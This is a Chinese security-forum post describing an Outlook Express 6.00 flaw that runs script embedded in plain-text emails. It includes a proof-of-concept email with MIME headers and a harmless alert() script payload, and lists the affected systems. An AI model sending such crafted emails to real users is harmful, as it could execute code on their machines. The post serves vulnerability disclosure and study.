|
 | 作者: group [group]
 论坛用户 |
登录 |
| 正常情况下,只有 html 邮件[Content-Type: text/html]才会解析 html 和脚本代码。但是在最新推出的 Outlook Express 6.00 中,纯文本邮件中如果加入了脚本代码,它们也会被解释执行。攻击者有可能利用该漏洞发送一段恶意的代码到受影响的服务器,将可能获得受影响系统中的权限。 缺省情况下,Outlook Express 6.00禁止脚本执行,因此缺省情况下用户不会受此问题影响。 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负 发送下列的纯文本邮件也会导致执行脚本: MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Source: 11.09.01 http://www.malware.com <script>alert("freak");alert("show")</script> 受影响的系统: Outlook Express 6.00 - Microsoft Windows 9x - Microsoft Windows NT 4.0 - Microsoft Windows 2000 解决方案: 暂无 |
| 地主 发表时间: 1/11 2:33 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: OE 6纯文本邮件脚本执行漏洞